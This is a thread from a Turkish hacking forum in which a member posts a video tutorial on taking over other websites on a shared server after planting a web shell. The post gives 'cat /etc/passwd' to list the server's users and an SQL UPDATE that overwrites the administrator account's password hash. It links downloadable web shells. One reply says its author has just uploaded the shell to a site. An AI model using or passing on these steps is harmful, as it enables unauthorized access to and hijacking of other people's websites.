Sunucu İçerisindeki Siteleri Komut İle Hackleme. / Omar1306

'OmaR1306

Uzman üye
16 Ara 2012
1,077
0
Ankara
Selamun Aleyküm Arkadaşlar.Bugün Bilmeyenler İçin Bir Video Hazırlamak İstedim.(Sesli Anlatım)
Direk Konumuza Gelelim.

Video
[ame="https://www.youtube.com/watch?v=gyDuLe_xEjA&feature=youtu.be"]VİDEO İÇİN TIKLAYINIZ.[/ame]

Config Çekme Kodumuz;
Kod:
cat /etc/passwd

Önemli Kodumuz;
Kod:
UPDATE TabloYukarıusers SET pass ='$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML' WHERE uid = 1;

Gereken Shelller;
Tıkla İndir.

Rar İçerisinden Resim;
lOLl8B.png

Virüs Total;
Tıkla Gör

Lütfen Yardımcı Olabildiysem Eğer
post_thanks.gif
Tuşuna Basmayı Unutmayınız. :) İyi Akşamlar.

Son düzenleme:

2nokta

Yaşayan Forum Efsanesi
28 Şub 2013
16,689
16
Bu konulara çok hakim değilim ama ..
Anlatımın ve ses tonun çok iyi..
Eğitim verebilirsin aslında.. :)

'OmaR1306

Uzman üye
16 Ara 2012
1,077
0
Ankara
Bu konulara çok hakim değilim ama ..
Anlatımın ve ses tonun çok iyi..
Eğitim verebilirsin aslında.. :)

Bildiğim konular üzerinde istekler gelir ise neden olmasın bu foruma bu THT Ailesine canım feda ne öğrendiysem burada öğrendim sonuçta diğerlerine öğretmek benim için hiç sorun olmaz :)

2nokta

Yaşayan Forum Efsanesi
28 Şub 2013
16,689
16
Bildiğim konular üzerinde istekler gelir ise neden olmasın bu foruma bu THT Ailesine canım feda ne öğrendiysem burada öğrendim sonuçta diğerlerine öğretmek benim için hiç sorun olmaz :)

İnşallah dostum.. :)
Gereken ilgi gösterilir.. :)
En çok sorulan sorular belli ..
Site nasıl hacklersim vs. vs..
Ama icraata gelince uzun yazıları okumuyolar..
Videoları izlemiyolar..
İzleyenleri tenzih ediyorum ama diğer bahsettiğm grup çok malesef..
Güzel video.. Hak ettiği ilgiyi görür inşallah :)

'OmaR1306

Uzman üye
16 Ara 2012
1,077
0
Ankara
İnşallah dostum.. :)
Gereken ilgi gösterilir.. :)
En çok sorulan sorular belli ..
Site nasıl hacklersim vs. vs..
Ama icraata gelince uzun yazıları okumuyolar..
Videoları izlemiyolar..
İzleyenleri tenzih ediyorum ama diğer bahsettiğm grup çok malesef..
Güzel video.. Hak ettiği ilgiyi görür inşallah :)

İnşallah dostum.Ben bunu hasta halimde çektim gene canları sağolsun ama güzel bir bilgi verdim sonuçta inşallah sonuna kadar izlerler :)

xByRamsey

Uzman üye
30 Eyl 2017
1,408
7
Hacktivizm
Tamda ben bi siteye bu shelli atmıştım ancak sunucudaki diğer siteleri nasıl bulacağımı bilmiyodum bi baktım bu konu :D bala bak

Bide görüntü kalitesi biraz kötü komutlar görükmüyor. başta ne yazdığınızı söylermisiniz ?

'OmaR1306

Uzman üye
16 Ara 2012
1,077
0
Ankara
Tamda ben bi siteye bu shelli atmıştım ancak sunucudaki diğer siteleri nasıl bulacağımı bilmiyodum bi baktım bu konu :D bala bak

Bide görüntü kalitesi biraz kötü komutlar görükmüyor. başta ne yazdığınızı söylermisiniz ?

Video kalitesi değildir senin netin yavaş olabilir 1080 ile kayıt ettim :) Kod ise : cat /etc/passwd.
Teşekkür butonuna basarsın artık heralde :D

'OmaR1306

Uzman üye
16 Ara 2012
1,077
0
Ankara
Moderatör tarafında düzenlendi:

'OmaR1306

Uzman üye
16 Ara 2012
1,077
0
Ankara
Yeni Mesaj

Teşekkürler :)

Yararlı bir konu olduğu için güncel tuttuyorum.

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.